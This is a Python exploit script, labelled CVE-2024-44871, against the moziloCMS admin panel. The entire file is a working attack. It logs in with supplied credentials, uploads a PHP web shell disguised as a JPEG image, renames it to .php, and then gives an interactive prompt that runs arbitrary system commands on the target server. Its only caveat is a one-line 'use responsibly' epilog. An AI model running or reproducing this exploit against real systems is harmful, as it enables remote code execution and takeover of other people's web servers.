import requests
import argparse
import time
import uuid
import urllib

file_name = str(uuid.uuid4()).split("-")[0]


def login(session, target):
	headers = {
	    "Host": f"{target}",
	    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0",
	    "X-Requested-With": "XMLHttpRequest",
	    "Referer": f"{target}/admin/index.php?nojs=true&action=files&multi=true",
	    "Origin": f"{target}",
	}

	data = {
		"username": f"{username}",
		"password": f"{password}",
		"login": "Login"
	}

	endpoint = "/admin/index.php"
	url = f"{target}{endpoint}"
	response = session.post(url=url, data=data, headers=headers)
	if "moziloCMS Admin - Home" in response.content.decode():
		return True
	return False


def upload_shell(session, target, payload):
	files = {"files[]": [f"{file_name}.jpg", payload.encode(), "image/jpeg"]}

	data = {
		"curent_dir": "Willkommen",
		"chancefiles": "true",
		"action": "files"
	}

	headers = {
	    "Host": f"{target}",
	    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0",
	    "X-Requested-With": "XMLHttpRequest",
	    "Referer": f"{target}/admin/index.php?nojs=true&action=files&multi=true",
	    "Origin": f"{target}",
	}

	endpoint = "/admin/index.php"
	url = f"{target}{endpoint}"
	response = session.post(url=url, data=data, files=files, headers=headers)

	if '"delete_url"' in response.content.decode():
		return True	

	return False


def rename_file(session, target):
	data = {
		"action": "files",
		"newfile": f"{file_name}.php",
		"orgfile": f"{file_name}.jpg",
		"curent_dir": "Willkommen",
		"changeart": "file_rename"
	}

	headers = {
	    "Host": f"{target}",
	    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
	    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0",
	   	"X-Requested-With": "XMLHttpRequest",
	    "Referer": f"{target}/admin/index.php?nojs=true&action=files&multi=true",
	    "Origin": f"{target}",
	}

	endpoint = "/admin/index.php"
	url = f"{target}{endpoint}"
	response = session.post(url=url, data=data, headers=headers)
	print(f"REPSONSE CODE: {response.status_code}")

	if '"success' in response.content.decode():
		return True

	return False


def send_commands(session, target, endpoint):
	response = session.get(f"{target}{endpoint}")

	return response.content.decode().split("<pre>")[1].split("</pre>")[0]


if __name__ == "__main__":
	parser = argparse.ArgumentParser(prog='CVE-2024-44871', description='uploads webshell', epilog='PLEASE USE RESPONSIABLY')
	parser.add_argument("-p", help="enter password", required=True)
	parser.add_argument("-u", help="enter username", required=True)
	parser.add_argument("-t", help="target url with http/https but not ending with /", required=True)

	args = parser.parse_args()

	username = args.u
	password = args.p
	target = args.t

	payload = '<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>'

	session = requests.Session()

	if login(session, target):
		time.sleep(1)
		if upload_shell(session, target, payload):
			time.sleep(1)
			if rename_file(session, target):
				print("shell has been activated\n")

				file_dir = f"/kategorien/Willkommen/dateien/{file_name}.php?cmd="
				while True:
					command = ""
					try:
						command = str(input("# "))
						if command == "":
							break
					except:
						break
					system_response = send_commands(session, target, file_dir + urllib.parse.quote_plus(command))
					print(system_response)
			else:
				print("[-] Failed to rename file to php")
		else:
			print("[-] Failed to upload shell")
	else:
		print("[-] Login failed")

	session.close()